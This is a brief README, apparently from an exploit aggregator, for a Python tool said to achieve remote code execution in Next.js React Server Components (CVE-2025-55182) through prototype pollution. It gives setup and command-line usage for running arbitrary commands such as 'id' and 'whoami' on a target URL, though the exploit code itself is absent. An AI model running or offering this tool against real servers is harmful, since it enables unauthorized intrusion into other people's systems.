Share
## https://sploitus.com/exploit?id=FE51B2B3-014A-5BA4-813C-5CC7F64DAC8F
# Next.js React Server Components RCE Exploit

Exploits CVE-2025-55182 for remote code execution via prototype pollution.

## Installation

```bash
uv sync
```

## Usage

```bash
source .venv/bin/activate
python3 exploit.py -u https://example.com -c "id"
```

### Options

- `-u, --url`: URL/host to check (required)
- `-c, --cmd`: Command to execute (required)
- `--timeout`: Request timeout in seconds (default: 10)

## Example

```bash
python3 exploit.py -u https://example.com -c "whoami"
```